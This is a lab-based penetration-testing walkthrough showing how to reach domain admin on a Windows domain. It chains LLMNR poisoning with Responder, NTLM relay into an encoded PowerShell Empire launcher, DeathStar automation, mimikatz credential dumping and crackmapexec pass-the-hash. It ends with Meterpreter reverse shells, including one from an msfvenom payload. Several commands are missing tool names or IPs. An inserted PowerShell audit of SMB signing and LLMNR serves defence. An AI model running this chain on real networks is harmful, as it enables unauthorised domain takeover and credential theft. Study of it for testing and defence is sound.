Automating the Pentesting Process: Using NTLM Relaying & Deathstar to get Domain Admin

What I’m using:

Deathstar (Install Guide here)

Operating Systems

Host: Ubuntu 16.04, Kali Linux (Latest)

Target 1: Windows Server 2008 R2 (Dummy server)

Target 2: Windows Server 2008 R2 (Domain Controller)

In a domain, it’s not uncommon for NTLMv2 hashes to be captured in some way while doing a penetration test. The problem is that NTLMv2 hashes cannot be passed (regular NTLM hashes can), so if your dictionary isn’t good or the domain enforces a strict password policy with numbers and special characters, you’ll be sitting with an NTLMv2 hash and a username and nothing to do with them. However, there is the option of relaying that username and hash. The nasty thing about this is that NTLM relaying can lead to remote code execution if the captured credentials have access to shares on a Windows server. What’s even worse is that a few tools can automate the entire damn thing.

Now before I get started there’s a few things I’d like to clarify.

  1. I have to use Ubuntu for Deathstar because Deathstar will not work with the current version of Kali, due to the Python requests library refusing to negotiate any TLS version lower than 1.2.
  2. The first part of this process assumes that NTLM relaying is possible; if SMB signing is enabled, this entire operation is dead in the water. By default, it’s disabled, so that’s good/bad depending on your perspective. Deathstar needs an Empire agent to work, so if you can get that agent onto a machine by any means, Deathstar will do its stuff. It doesn’t NEED NTLM relaying; this is just an interesting way of getting an Empire agent.
  3. I’m doing this on my lab network, not someone else’s. This demo simulates what can happen if LLMNR spoofing is possible and a domain admin’s credentials are captured. This is a very limited demo of what Deathstar & Crackmapexec can do, and I encourage you to read about its capabilities here.
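As an added defender-side check (not from the original post), the following PowerShell reads the local registry values behind the two prerequisites named above, SMB signing and LLMNR, and reports whether the host is exposed to relay and poisoning. The function names are mine; the registry paths and value names are the standard Windows ones.

```powershell
# Added audit check, not part of the original write-up. It inspects the local registry values
# that govern the two conditions the relay chain depends on: SMB signing not required (relay
# possible) and LLMNR enabled (poisoning possible). Run in an elevated PowerShell on the host.

function Get-RegDword {
    param([string]$Path, [string]$Name)
    # Returns $null when the key or value is absent, so callers can treat "missing" explicitly
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.$Name
}

function Test-RelayExposure {
    # SMB server: 1 = inbound SMB sessions must be signed, which blocks relaying TO this host
    $serverSign = Get-RegDword 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' 'RequireSecuritySignature'
    # SMB client: 1 = this host refuses unsigned servers, which limits what its outbound auth can be relayed into
    $clientSign = Get-RegDword 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters' 'RequireSecuritySignature'
    # LLMNR: policy value EnableMulticast = 0 disables it; a missing value means LLMNR is on (the default)
    $llmnr = Get-RegDword 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient' 'EnableMulticast'

    $findings = @()
    if ($serverSign -ne 1) { $findings += 'SMB server signing not required: NTLM relay to this host is possible' }
    if ($clientSign -ne 1) { $findings += 'SMB client signing not required: this host will authenticate to unsigned servers' }
    if ($llmnr -ne 0)      { $findings += 'LLMNR enabled: mistyped share names can be answered by a poisoner such as Responder' }

    [pscustomobject]@{
        ComputerName             = $env:COMPUTERNAME
        SmbServerSigningRequired = ($serverSign -eq 1)
        SmbClientSigningRequired = ($clientSign -eq 1)
        LlmnrDisabled            = ($llmnr -eq 0)
        Findings                 = $findings
    }
}

Test-RelayExposure | Format-List
```

A domain controller requires SMB server signing by default, so expect it to report SmbServerSigningRequired as True while member servers and workstations report False. The fixes are Group Policy settings: "Microsoft network server: Digitally sign communications (always)" for signing and "Turn off multicast name resolution" (DNS Client) for LLMNR.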

Without further ado:

I first start up the RESTful API for Empire in one terminal.

sudo python empire --rest --username empireadmin --password Password123

Then I start up Deathstar in another.

sudo ./ --listener-ip -t 100

Listener IP will be whatever IP Empire is listening on. -t 100 means I’m giving it 100 threads to run, so it’s faster.

Next, I generate the powershell script from Empire. To do this, go to the listener module in Empire by typing in



From here, I create the payload by using the command

launcher powershell Deathstar


Copy the powershell script as you’ll paste it in a minute.

Next, I set up (Guide to set up here)

sudo -t -c 'powershell -noP -sta -w 1 -enc  [powershell code]'

The relay tool also supports target files with the -tf switch, so you can put in multiple targets if you want. Note that the powershell script must be in quotes or else it won’t run.

Next, edit the Responder.conf file in the Responder repository and turn off SMB and HTTP.


Finally, start up Responder

sudo python -I ens33 -r -d -v


My screen then looks like this once it’s all set up.


Next, using my Windows machine, I simulate the domain admin mistyping a share, generating a LLMNR request.


A poisoned answer is then sent via Responder


NTLMv2 hashed credentials are relayed


Empire agent opened


Deathstar automatically starts doing its thing


Deathstar, for this demo, took about 5 minutes to find the domain controller, its active users, then spawn another Empire agent on the domain controller.


An Empire agent is now running on the DC


The final step is to get a shell.

There are many ways to do this:

  1. Upload a meterpreter payload in the form of a .exe and execute it via the shell command
  2. Use mimikatz to get the credentials on the server and use crackmapexec to pass the hash and open a meterpreter session
  3. Use Empire’s Invoke-Shellcode module
  4. Many more, research it.


Using Mimikatz & Crackmapexec to open Meterpreter Shell

First, interact with the agent. Always use the agent with SYSTEM privileges. While user “god” is a domain admin, SYSTEM is still a higher privilege.

interact [agent name]


Then run mimikatz



After a minute it’ll spit out a ton of info. Ignore it by pressing enter and then typing


and a nice table is shown.


As you can see, it found the hashes and plain text password of the domain administrator. From here, we can use crackmapexec to open a reverse shell.

First, set up multi/handler.

Then run crackmapexec. Even though I have the password in plain text, I’m demonstrating the hash here to show that pass-the-hash (PTH) is possible.

crackmapexec -u god -H 7314885dc066c5fd98e6ae96832fa905 -M metinject -o LHOST= LPORT=4443




Uploading a Meterpreter Payload via Empire

First, create a Meterpreter payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4443 -f exe > shell.exe


Copy the .exe into the Empire directory


Interact with the agent in Empire

interact [Agent name]

Upload and execute the .exe


Grats on shell


There are many, many more ways to escalate from an agent to a shell, but these are two of the easiest. Uploading an executable is not the stealthiest and is probably the least recommended, but a shell is a shell.


Extra Resources and credit for Deathstar & Crackmapexec:
